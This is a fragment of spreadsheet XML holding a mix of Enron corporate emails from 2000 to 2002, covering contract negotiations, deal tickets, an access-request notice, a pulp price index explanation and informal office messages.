&gt;    the "manifesto."  McFadden was one of the manifesto's signatories._x000D_
&gt;_x000D_
&gt;Finally, we are working on "model Legislation" proposing a market-based_x000D_
&gt;solution that we will share with you soon and that we hope the business_x000D_
&gt;community--and the Valley in particular--can embrace and advocate._x000D_
&gt;_x000D_
&gt;I realize that this is a lot of information and I apologize for the length_x000D_
&gt;of this note, but I wanted to try to make sure that you're up-to-date._x000D_
&gt;Please don't hesitate to give me a call if you'd like to discuss further._x000D_
&gt;_x000D_
&gt;Best,_x000D_
&gt;Jeff_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;(See attached file: Manifesto-final version.doc)(See attached file:_x000D_
&gt;McFadden Editorial in WSJ.doc)(See attached file: Demand buy-down_x000D_
&gt;proposal.doc)_x000D_
&gt;_x000D_
&gt;</t>
  </si>
  <si>
    <t>Wed, 21 Feb 2001 08:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kent.shoemaker@ae.ge.com', 'stephen.swift@ps.ge.com', 'michael.barnas@ps.ge.com'})</t>
  </si>
  <si>
    <t>End World Hunger - Warranty</t>
  </si>
  <si>
    <t xml:space="preserve">Per our discussion today, attached is a copy of the warranty provision on _x000D_
which I have marked my suggested edit to the "suitable grade" language._x000D_
_x000D_
Regards,_x000D_
_x000D_
Scott_x000D_
_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 09:28:47 -0800 (PST)</t>
  </si>
  <si>
    <t>Request Submitted: Access Request for janelle.russell@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">You have received this email because you are listed as an alternate data approver. Please click http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000076605&amp;Page=Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000076605_x000D_
Approver            : sandeep.kohli@enron.com_x000D_
Request Create Date : 11/19/01 11:28:43 AM_x000D_
Requested For       : janelle.russell@enron.com_x000D_
Resource Name       : \\enehou\houston\common\Research - [Read/Write]_x000D_
Resource Type       : Directory_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Nov 2001 12:20:43 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: BBall 2-on-2 Tournament</t>
  </si>
  <si>
    <t xml:space="preserve"> http://abcnews.go.com/sections/us/WolfFiles/wolffiles.html_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	val.generes@accenture.com@ENRON   On Behalf Of val.generes@accenture.com_x000D_
Sent:	Monday, November 05, 2001 1:10 PM_x000D_
To:	val.generes@accenture.com_x000D_
Cc:	scott_bateman@qbsol.com; timothy_blanchard@enron.com; kevin.a.boone@accenture.com; bcannizaro@shellus.com; sdarrah@entergy.com; nicholas.danna@ey.com; tdietz@marmac.net; cgener1@hotmail.com; jgener1@lsu.edu; brglass@earthlink.net; Landry, Chad; Lenhart, Matthew; mmmarcantel@equiva.com; samm@dynegy.com; jpelti@lsumc.edu; edsarrat@alumni.utexas.net; charles.c.schmidt@accenture.com; TanoryT@bp.com; brian.r.vassigh@accenture.com; kevin.labban@accenture.com; matthew.j.garver@accenture.com; john.r.ray@accenture.com; shawn.wharton@accenture.com; john.r.beaty@accenture.com; jeffrey.glynn@accenture.com; danthony@ipathsolutions.com; Hull, Bryan; Bass, Eric; edmund.b.hsieh@accenture.com_x000D_
Subject:	BBall 2-on-2 Tournament_x000D_
_x000D_
1st Annual 2-on-2 Basketball Tournament_x000D_
_x000D_
When:          November 17th @ 11AM_x000D_
_x000D_
Where:         4527 Holly St._x000D_
          Bellaire, TX 77401_x000D_
_x000D_
Details:       It will be a 2-on-2 tournament at my house starting around_x000D_
11AM.  I should have college football games on all day in the house.  LSU,_x000D_
UT, and A&amp;M are all off that weekend._x000D_
_x000D_
I'm supplying all the gatorade, ice, and anything else we may need.  Bring_x000D_
$5 to pay for the gatorade and whatever is left over can buy beer/go to the_x000D_
winners._x000D_
_x000D_
We will not setup teams.  You either come with your partner or come hoping_x000D_
that someone else needs a partner, too._x000D_
_x000D_
It will be a double-elimination tournament on a 8 1/2 or 9 ft. goal and_x000D_
scoring will go as follows: to seven by ones, winning by two or first to_x000D_
ten points to keep games moving.  We may need to put a time limit on games_x000D_
if we have too many teams._x000D_
_x000D_
If someone has an old TV that they can bring over, we can put it on in the_x000D_
garage in the backyard._x000D_
_x000D_
If you want to reply to me, please don't reply to all.  This invitation is_x000D_
not limited to people in the cc: field, but please don't invite another ten_x000D_
people.  We should have enough teams._x000D_
_x000D_
Call me, or send me an email, if you have any questions._x000D_
_x000D_
Thanks -_x000D_
Val_x000D_
Home - (713) 592-8280_x000D_
Work - (713) 837-5984_x000D_
Cell - (281) 788-6907_x000D_
_x000D_
____________________________________________________________x000D_
Val Generes_x000D_
eCommerce Technology Consultant_x000D_
Houston 83/75984, 713-837-5984_x000D_
_x000D_
_x000D_
This message is for the designated recipient only and may contain_x000D_
privileged or confidential information.  If you have received it in error,_x000D_
please notify the sender immediately and delete the original.  Any other_x000D_
use of the email by you is prohibited.</t>
  </si>
  <si>
    <t>Wed, 30 May 2001 00:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FW: EnergyOne</t>
  </si>
  <si>
    <t xml:space="preserve">Thank you, I did that yesterday._x000D_
_x000D_
_x000D_
_x000D_
	Sylvia S Pollan/ENRON@enronXgate_x000D_
	05/30/2001 07:28 AM_x000D_
		 _x000D_
		 To: Dan J Hyvl/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: FW: EnergyOne_x000D_
_x000D_
Please provide Brant  the redline version._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Sylvia_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Reves, Brant  _x000D_
Sent: Tuesday, May 29, 2001 5:31 PM_x000D_
To: Hyvl, Dan_x000D_
Cc: Pollan, Sylvia S._x000D_
Subject: RE: EnergyOne_x000D_
_x000D_
Do you have a redline version of our initial contract to them?  I never saw _x000D_
my comments included in a draft...  _x000D_
_x000D_
thanks_x000D_
brant_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Hyvl, Dan  _x000D_
Sent: Monday, May 21, 2001 9:59 AM_x000D_
To: Reves, Brant_x000D_
Cc: Pollan, Sylvia S._x000D_
Subject: EnergyOne_x000D_
_x000D_
Brant,_x000D_
 EnergyOne has responded to the requested changes.  They agree to the _x000D_
revision of the MAC language but threw in a money wrench by adding a warm and _x000D_
fuzzy triggering event  if a party refused to provide security within 48 _x000D_
hours of a reasonable request therefore.  No standard is provided as to the _x000D_
reason for the request.    They also deleted the original Collateral _x000D_
Threshold language which was in their first draft.  Please respond to these _x000D_
matters to me and to Sylvia Pollan. _x000D_
----- Forwarded by Dan J Hyvl/HOU/ECT on 05/21/2001 09:47 AM -----_x000D_
_x000D_
_x000D_
	Dan J Hyvl 05/21/2001 08:59 AM 	   To: Sylvia S Pollan/Enron@EnronXGate  cc:   _x000D_
Subject: EnergyOne_x000D_
_x000D_
_x000D_
Attached is a memo of the major items in their comments to our requested _x000D_
changes.  Let me know when you are ready to discuss._x000D_
_x000D_
 &lt;&lt; File: 2001-035memo.doc &gt;&gt; _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Mar 2001 01:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>deal 534056</t>
  </si>
  <si>
    <t>Can you change the time zone to PPT so that the strips accurately splits the _x000D_
zime change for April._x000D_
_x000D_
_x000D_
The first strip should be   4/1 - 4/1    M-S    PDT   07-22_x000D_
The next strip should be  4/2 - 4/30  M-S   PDT   07-22_x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Wed, 5 Apr 2000 04:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Buyback / Deficiency Deals Worksheet</t>
  </si>
  <si>
    <t xml:space="preserve"> Please make the following changes and redistribute your  worksheet.   Thanks _x000D_
!_x000D_
_x000D_
_x000D_
 1). Please update Equistar "Swing"  Sitara ticket # as: 156337. Equistar _x000D_
"Sale" should reflect _x000D_
      " various" due  to the different deals associated with this _x000D_
counterparty. _x000D_
_x000D_
 2). Valero Marketing  &amp; Supply "undertake" Sitara ticket #'s are as follows:_x000D_
_x000D_
            Mtr. 981394....148396_x000D_
          Mtr. 988018....148381_x000D_
          Mtr. 981233....148388_x000D_
        _x000D_
_x000D_
 3). Valero Marketing &amp; Supply "Swing" Sitara ticket #'s are as follows: _x000D_
  _x000D_
          Mtr. 981394......148391_x000D_
         Mtr. 988018......148382_x000D_
         Mtr. 981233......148386</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 10:25:46 -0800 (PST)</t>
  </si>
  <si>
    <t>you are absolutely wrong_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 19, 2001 12:24 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
i think that you brought it up._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Monday, November 19, 2001 12:18 PM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
you didnt bring it up for no reason_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 19, 2001 12:17 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
no it wasn't.  i told you that robyn said you should come up when i did and we could all go out.  remember buddy,  i wasn't as drunk as you were.  by the way, did you get sick on the way home?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Monday, November 19, 2001 12:16 PM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
first of all ny was your idea_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 19, 2001 12:15 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	_x000D_
_x000D_
so are you going to tell me or just leave me hanging out here?</t>
  </si>
  <si>
    <t>Sun, 24 Feb 2002 18:04:59 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'susan_m_scott@enron.com'})</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
_x000D_
&gt;From: "Tobin Carlson" &lt;tobin1977@hotmail.com&gt;_x000D_
&gt;To: susan_m_scott@hotmail.com_x000D_
&gt;Date: Thu, 21 Feb 2002 12:32:39 -0600_x000D_
&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
__________________________________________________________________x000D_
MSN Photos is the easiest way to share and print your photos:_x000D_
http://photos.msn.com/support/worldwide.aspx_x000D_
_x000D_
Received: from 192.146.136.210 by lw9fd.law9.hotmail.msn.com with HTTP;	Thu, 21 Feb 2002 18:32:39 GMT_x000D_
X-Originating-IP: [192.146.136.210]_x000D_
From: "Tobin Carlson" &lt;tobin1977@hotmail.com&gt;_x000D_
To: susan_m_scott@hotmail.com_x000D_
Date: Thu, 21 Feb 2002 12:32:39 -0600_x000D_
Mime-Version: 1.0_x000D_
Content-Type: text/html_x000D_
X-Stn-Info:_x000D_
_x000D_
_x000D_
TEST?! I hope this is getting to you. I switched email addresses and have been trying a dozen to find you. Let me know if this gets to you...._x000D_
 _x000D_
Tobin</t>
  </si>
  <si>
    <t>Thu, 16 Mar 2000 07:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'john.king@enron.com'})</t>
  </si>
  <si>
    <t>Re: Motown</t>
  </si>
  <si>
    <t xml:space="preserve">The attached may actually be a little more descriptive than the presentation _x000D_
that John sent out earlier today._x000D_
_x000D_
RH_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Mar 2001 05:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Presentation on Misdeclaration for the lenders</t>
  </si>
  <si>
    <t xml:space="preserve">This is a follow-up to my voice mail on the MESB claim.  Our draft statement _x000D_
(still needs final EGA and legal review) is attached.  In addition, a _x000D_
presentation on the issue (for internal use only) appears at the bottom of _x000D_
this string of e-mails.  We expect the issue to hit the press modestly _x000D_
tomorrow._x000D_
_x000D_
John_x000D_
_x000D_
_x000D_
---------------------- Forwarded by John Ambler/ENRON_DEVELOPMENT on _x000D_
03/01/2001 01:21 PM ---------------------------_x000D_
_x000D_
_x000D_
Paul Kraske_x000D_
03/01/2001 03:55 AM_x000D_
To: Jimmy Mogal/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Atul _x000D_
Agarwal/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: John Ambler/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Presentation on Misdeclaration for the lenders_x000D_
_x000D_
I actually have not checked this out yet.  As a result, I would not publish _x000D_
it further without circling back with the group.  Still, I think it's a good _x000D_
place to start on the issue.  _x000D_
Paul_x000D_
---------------------- Forwarded by Paul Kraske/ENRON_DEVELOPMENT on _x000D_
03/01/2001 03:16 PM ---------------------------_x000D_
_x000D_
_x000D_
Aman Sachdeva_x000D_
03/01/2001 02:52 PM_x000D_
To: Ananda Mukerji/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mohan _x000D_
Gurunath/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Robert _x000D_
Mathis/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Paul _x000D_
Kraske/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, P _x000D_
Mohanram/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Venkatesh _x000D_
Gopalkrishnan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Heidi _x000D_
Hellmann/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Rajesh _x000D_
Sivaraman/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
_x000D_
Subject: Presentation on Misdeclaration for the lenders_x000D_
_x000D_
Attached please find the presentation on misdeclaration for the lenders.  _x000D_
Robert Mathis has prepared a draft of the letter to the lenders which _x000D_
essentially discusses most of the points highlighted in the presentation and _x000D_
thus we might decide not to include the presentation at all.  _x000D_
_x000D_
However I would appreciate your comments at the earliest if we decide to _x000D_
include the presentation._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 26 Jul 2001 05:45:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'timo@foex.fi'})</t>
  </si>
  <si>
    <t>RE: Foex Index; yr two e-mails</t>
  </si>
  <si>
    <t>This was very helpful._x000D_
thanks a lot_x000D_
MOnika Causholli_x000D_
_x000D_
-----Original Message-----_x000D_
From: Timo Ter?s [mailto:timo@foex.fi]_x000D_
Sent: Tuesday, July 24, 2001 11:29 AM_x000D_
To: Causholli, Monika_x000D_
Cc: tuula@foex.fi_x000D_
Subject: Re: Foex Index; yr two e-mails_x000D_
_x000D_
_x000D_
Hi Monika,_x000D_
_x000D_
Welcome to the pulp and paper world._x000D_
_x000D_
In order to understand the index system, the first thing is to look at our_x000D_
web-site www.foex.fi which includes a lot of information, particularly in_x000D_
this case the FAQ section. You probably have taken a look at that already,_x000D_
though._x000D_
_x000D_
Our two pulp indexes, NBSKP (Northern Bleached Softwood Kraft) and BHKP_x000D_
(birch+eucalyptus) cover the European market. As abt 40% of the world pulp_x000D_
trade is for the European market, these are, in a way, considered to be the_x000D_
"world market prices", particularly as the third biggest market, North_x000D_
America (Asia is the second biggest) has virtually the same prices as_x000D_
Europe; correlation between the two is well over 0.9._x000D_
_x000D_
The sellers reporting to us are, by definition, in NBSKP from Canada, US_x000D_
West Coast and the Nordic countries. BHKP (birch, euca) sellers are from the_x000D_
Nordic region, Latin America, Spain and Portugal and a number of_x000D_
Asian/African companies selling Eucalyptus pulp to the European market._x000D_
Buyers are European producers of paper and paperboard buying at least some_x000D_
of their pulp from the open market, representing virtually all countires in_x000D_
Western Europe. The split between birch and euca is approximately 30%/70%,_x000D_
again reflecting the actual situation in the European market._x000D_
_x000D_
The exact coverage is difficult to calculate as some of the data received_x000D_
from buyers are from same deals which are reported by the sellers and some_x000D_
are not. The producers reporting to us represent roughly 80% of the supply_x000D_
to Europe in the two benchmark grades._x000D_
_x000D_
Most (=80-90%) of the pulp sold in Europe is so-called contract business._x000D_
This means that a buyer and a seller have an annual or multiannual contract_x000D_
covering the grades and volumes, quantity rebates etc. However, prices are_x000D_
fixed also for contract business on a monthly/quarterly basis. Most of the_x000D_
pulp arriving Continental Europe or UK from abroad, goes through consignment_x000D_
warehouses (in places like Antwerp, Rotterdam, La Pallice, Tilbury,_x000D_
Savono-Livorno range etc.). As forwarding companies allow 30-60 days of free_x000D_
storage, buyers do not hold much inventory at their mills but take the pulp,_x000D_
delivered by sellers in large shipments, little be little by lorry, rail or_x000D_
barge. Each delivery is invoiced separately and those invoice prices are the_x000D_
price reported to us, before customer specific rebates. Prices are for prime_x000D_
grade pulp and for delivery during the current or latest for the following_x000D_
month._x000D_
_x000D_
The following comments are worth making:_x000D_
- Our system is based on first taking off top 10% and bottom 10% of the_x000D_
prices received and only then calculating the index (or rather benchmark)_x000D_
values. This way we avoid any clerical errors in the data received as well_x000D_
as any theoretical attempts of manipulation (we have never detected any_x000D_
attempts)_x000D_
- We have a more or less equal number of prices received from buyers and_x000D_
sellers. Some we receive through agents/merchants/trading houses - usually_x000D_
mandated by a supplier to give us the price data_x000D_
- If someone does not report their prices on a given week, we can use the_x000D_
previous week's data but only once_x000D_
- Prices are not volume-weighted (in order to avoid the manipulation_x000D_
possibility and unnecessary weekly changes up and down because a supplier_x000D_
sold one week to large customers and next week to small ones)_x000D_
- Prices are CIF European port before customer-specific rebates (again to_x000D_
avoid unnecessary volatility of the index at a time when prices remain_x000D_
unchanged; also, rebates are often given only afterwards - e.g. when_x000D_
exceeding a certain tonnage threshhold - and we cannot alter our indexes_x000D_
retroactively)_x000D_
- Our index system is approved by financial regulators and by European_x000D_
Community anti-trust regulators (=DG IV) and audited by_x000D_
PriceWaterhouseCoopers._x000D_
- There is a group of independent experts, case need, as "trouble shooters"._x000D_
Never have had any and never have received any official complaints about the_x000D_
index values._x000D_
- Participation is totally voluntary_x000D_
- The main reasons for differences between the often compared FOEX indexes_x000D_
and Pulpex quotations include:_x000D_
a) our prices are before customer-specific rebates (averaging 5-6%), Pulpex_x000D_
prices are net_x000D_
b) our prices are for contract business, Pulpex prices represent the lowest_x000D_
spot-levels in a weak market and highest spots in a strong market_x000D_
c) our price info is based on actual sales, Pulpex prices are expectations_x000D_
what the spot price might be in e.g. 3 month's time_x000D_
d) our price is for a prime quality (within each benchmark grade there are_x000D_
surprisingly large differences between individual mill grades sold) approved_x000D_
by a seller from a particular supplier/mill, whilst Pulpex prices, based on_x000D_
a delivery concept (i.e. you do not accept the price offered to close a_x000D_
contract, you can make/take delivery), are prices in a particular inventory_x000D_
location (3-4 alternative ones), sometimes far away from buyer's or seller's_x000D_
normal ports for any lot (often unknown/unwanted grade, up to 11 months and_x000D_
29 days old goods). This system tends to emphasize in the Pulpex system the_x000D_
extreme prices, up or down, particularly in these early stages with low_x000D_
liquidity._x000D_
- Our indexes are trade-marked products. Therefore their use for any_x000D_
commercial purposes is possible only with our permission. To get that_x000D_
permission, users pay us a small premium, the main source of our income._x000D_
Enron and FOEX Indexes Ltd. have a contract, Bob Crane has the details at_x000D_
your end._x000D_
_x000D_
I trust this is helpful. I encourage you to contact us anew for any_x000D_
additional questions._x000D_
_x000D_
Please find enclosed, for order's sake our pulp specs, some additional_x000D_
comments we send to the price providers and the historical price series you_x000D_
asked for (historical series are still without today's indexes, to be_x000D_
published about an hour from sending this message; you can add those from_x000D_
our web-site by the time you read this)._x000D_
_x000D_
My best regards to you as well as to David and Elizabeth._x000D_
_x000D_
Timo Teras_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Causholli, Monika &lt;Monika.Causholli@ENRON.com&gt;_x000D_
To: timo.teras@poyry.fi &lt;timo.teras@poyry.fi&gt;_x000D_
Cc: timo.teras@foex.fi &lt;timo.teras@foex.fi&gt;_x000D_
Date: 23. hein?kuuta 2001 11:43_x000D_
Subject: Foex Index_x000D_
_x000D_
_x000D_
Hello Mr. Teras,_x000D_
_x000D_
My name is Monika Causholli and I am a new analyst working at Enron_x000D_
Industrial Markets concentrating in pulp. I work with David Allan and_x000D_
Elizabeth Hutchinson whom you met in the conference in Las Vegas._x000D_
_x000D_
I am in the process of understanding the pulp market and how it works._x000D_
Right now I am working on a project where I have to analyze the FOEX_x000D_
index and the methodology behind it. I have seen one of the_x000D_
presentations that you have presented in the States a while ago but I am_x000D_
looking for a little bit more detail. For example, what kind of_x000D_
companies you contact, what percentage of industry they represent in_x000D_
terms of tonnage, markets that they represent, what geographic area_x000D_
these companies represent and anything else that you think its important_x000D_
to know._x000D_
_x000D_
I would very much appreciate your help in the matter,_x000D_
_x000D_
sincerely,_x000D_
MOnika Causholli</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 02:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: ENA / Coral Turbine Transaction</t>
  </si>
  <si>
    <t xml:space="preserve">$2.8 million._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Herman Manis_x000D_
12/11/2000 10:53 AM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Re: ENA / Coral Turbine Transaction  _x000D_
_x000D_
What is the current gain estimate on this deal?_x000D_
_x000D_
_x000D_
_x000D_
Kay Mann_x000D_
12/11/2000 10:37 AM_x000D_
To: Lisa Bills/Corp/Enron@ENRON, Herman Manis/Corp/Enron@ENRON, Roger _x000D_
Ondreko/HOU/ECT@ECT, Roseann Engeldorf/Corp/Enron@ENRON, Matthew F _x000D_
Gockerman/HOU/ECT@ECT_x000D_
cc: Ben Jacoby/HOU/ECT@ECT _x000D_
Subject: ENA / Coral Turbine Transaction_x000D_
_x000D_
Hot of the press.  This should be very close to the last version._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 12/11/2000 10:36 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Campbell, Carolyn" &lt;CCampbell@KSLAW.com&gt; on 12/11/2000 09:53:03 AM_x000D_
To: "'gkutzschbach@fulbright.com'" &lt;gkutzschbach@fulbright.com&gt;, _x000D_
"'areynaud@coral-energy.com'" &lt;areynaud@coral-energy.com&gt;, _x000D_
"'dwhaley@coral-energy.com'" &lt;dwhaley@coral-energy.com&gt;, _x000D_
"'TSeigler@coral-energy.com'" &lt;TSeigler@coral-energy.com&gt;_x000D_
cc: "'Ben.F.Jacoby@enron.com'" &lt;Ben.F.Jacoby@enron.com&gt;, _x000D_
"'Kay.Mann@enron.com'" &lt;Kay.Mann@enron.com&gt;, "Keffer, John" _x000D_
&lt;JKeffer@KSLAW.com&gt; _x000D_
_x000D_
Subject: ENA / Coral Turbine Transaction_x000D_
_x000D_
_x000D_
 &lt;&lt;2R6LRED.DOC&gt;&gt;  &lt;&lt;2RM3RED.DOC&gt;&gt;  &lt;&lt;2RLSRED.DOC&gt;&gt;  &lt;&lt;2R6KRED.DOC&gt;&gt;_x000D_
_x000D_
We have enclosed the following documents for your review:_x000D_
_x000D_
 1. Revised draft dated 12-11-2000 of the Letter Agreement for_x000D_
CA Energy Development I, LLC, marked to reflect revisions from the draft_x000D_
circulated by King &amp; Spalding on 12-09-2000;_x000D_
_x000D_
 2. Revised draft dated 12-11-2000 of the Letter Agreement for_x000D_
CA Energy Development II, LLC, marked to reflect revisions from the draft_x000D_
circulated by King &amp; Spalding on 12-09-2000;_x000D_
_x000D_
 3. Revised draft dated 12-11-2000 of the Letter Agreement for_x000D_
CA Energy Development II, LLC pertaining to the transformer, marked to_x000D_
reflect revisions from the draft circulated by King &amp; Spalding on_x000D_
12-09-2000; and_x000D_
_x000D_
 4. Revised draft dated 12-11-2000 of the Liability Company_x000D_
Agreement of CA Energy Development I, LLC, marked to reflect revisions from_x000D_
the draft circulated by King &amp; Spalding on 12-09-2000._x000D_
_x000D_
We still need confirmation of the name of the last director for the LLC and_x000D_
the date for exercising the call/put option in Section 6.2 of the LLC_x000D_
Agreement.  Please advise at your earliest convenience.  Thank you._x000D_
_x000D_
Carolyn M. Campbell_x000D_
King &amp;  Spalding_x000D_
713-276-7307 (phone)_x000D_
713-751-3280 (fax)_x000D_
ccampbell@kslaw.com &lt;mailto:ccampbell@kslaw.com&gt;_x000D_
_x000D_
_x000D_
Enclosures: 128541vR13/12_x000D_
  129099v4/3_x000D_
  129088v5/4_x000D_
  128540v9/8_x000D_
_x000D_
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 2R6LRED.DOC_x000D_
 - 2RM3RED.DOC_x000D_
 - 2RLSRED.DOC_x000D_
 - 2R6KRED.DOC_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 16 Apr 2002 04:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ilan.caplan@enron.com'})</t>
  </si>
  <si>
    <t>Weekly Report vs. O&amp;M Report</t>
  </si>
  <si>
    <t>Hollis - _x000D_
_x000D_
Per the phone conversation earlier today, below is a chart exhibiting the _x000D_
differences between the Monthly Operational Report (Mark Fisher) and the _x000D_
Weekly MTD (John Ruiz) numbers posted on the web.  Both cases should include _x000D_
the numbers through the end of the month.  From what we discussed, my _x000D_
understanding is that the chart should pool from the same source.  Please let _x000D_
me know if I am viewing this information incorrectly._x000D_
_x000D_
Thanks,_x000D_
Ilan</t>
  </si>
  <si>
    <t>Re: Out of Office</t>
  </si>
  <si>
    <t>Can I call you with a banana?</t>
  </si>
  <si>
    <t>Fri, 7 Dec 2001 07:55:03 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Attention Body Shop Members -- Body Shop Closure</t>
  </si>
  <si>
    <t xml:space="preserve">Ken, _x000D_
    I realize that times are tough, but this is really twisting the knife that is already deeply embedded in the majority of employees.  Have you ever gone down to the Body Shop in the mornings or at noon to see how many employees use the facility for health and stress relief purposes?  We've done a lot of things during the past few weeks to kill morale, but this is a new low.  Are you going to do anything about it?  I think that a lot of people would like to know._x000D_
_x000D_
Dan_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	General Announcement/Corp/Enron@ENRON   On Behalf Of Wellness@ENRON_x000D_
Sent:	Thursday, December 06, 2001 4:45 PM_x000D_
To:	Enron Houston@ENRON_x000D_
Subject:	Attention Body Shop Members -- Body Shop Closure_x000D_
_x000D_
The Body Shop will close today (December 6, 2001) at 7:30 p.m. and will remain closed indefinitely due to the current business circumstance.  _x000D_
_x000D_
Access to the Body Shop will be available from Friday, December 7 through Friday, December 14, during the hours of 8:00 a.m. - 5:00 p.m. for members to clean out their lockers.  _x000D_
_x000D_
Thank you.  </t>
  </si>
  <si>
    <t>Thu, 8 Mar 2001 07:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rjelici@smud.org', 'tingwer@smud.org'})</t>
  </si>
  <si>
    <t>Revised EEI Cover Sheet (2)</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Tom - _x000D_
_x000D_
When you get a chance, can you please fax over the SMUD "Board Resolution" _x000D_
that you mentioned last week?  I believe that it dealt with SMUD"s authority _x000D_
as well as delegation._x000D_
_x000D_
Thanks,  _x000D_
_x000D_
Shari Stack_x000D_
Enron North America, Legal Department_x000D_
Tel: (713) 853-9477_x000D_
Fax: (713) 646-3490_x000D_
----- Forwarded by Shari Stack/HOU/ECT on 03/08/2001 03:27 PM -----_x000D_
_x000D_
	Shari Stack_x000D_
	03/08/2001 12:17 PM_x000D_
		 _x000D_
		 To: tingwer@smud.org, rjelici@smud.org_x000D_
		 cc: Stewart Rosman/HOU/ECT@ECT, Tracy Ngo/PDX/ECT@ECT, Carol St _x000D_
Clair/HOU/ECT@ECT, Dan J Hyvl/HOU/ECT@ECT, Laird Dyer/SF/ECT@ECT, Kim _x000D_
Ward/HOU/ECT@ECT, bbrunel@smud.org, Marino.Monardi@smud.org_x000D_
		 Subject: Revised EEI Cover Sheet_x000D_
_x000D_
Dear Tom and Ron, _x000D_
_x000D_
Attached please find the revised EEI Cover Sheet which hopefully captures all _x000D_
the modifications agreed between SMUD and Enron. I have blacklined in all the _x000D_
modifications for ease of reference.  Please let me know if I have overlooked _x000D_
something. _x000D_
_x000D_
The Amendment Agreement for the ISDA should be coming shortly from my _x000D_
colleague, Carol St. Clair. _x000D_
_x000D_
Please let me know if you have any comments to the EEI. _x000D_
_x000D_
Thanks!  _x000D_
_x000D_
Shari Stack_x000D_
Enron North America, Legal Department_x000D_
Tel: (713) 853-9477_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 17 Dec 2001 08:42:45 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'davemfuller@earthlink.net'})</t>
  </si>
  <si>
    <t>worked_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Dave Fuller" &lt;davemfuller@earthlink.net&gt;@ENRON  _x000D_
Sent:	Monday, December 17, 2001 10:35 AM_x000D_
To:	Ward, Kim S (Houston)_x000D_
Subject:	test_x000D_
_x000D_
_x000D_
hi</t>
  </si>
  <si>
    <t>CALENDAR ENTRY:	REMINDER_x000D_
_x000D_
Description:_x000D_
	Monica - Vacation_x000D_
_x000D_
Date:		10/11/2000_x000D_
Time:		8:00 AM (Central Standard Time)_x000D_
_x000D_
Chairperson:	Outlook Migration Team_x000D_
_x000D_
Detailed Description:</t>
  </si>
  <si>
    <t>Thu, 9 Aug 2001 09:35:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: NBPL- Segmentation Discussion</t>
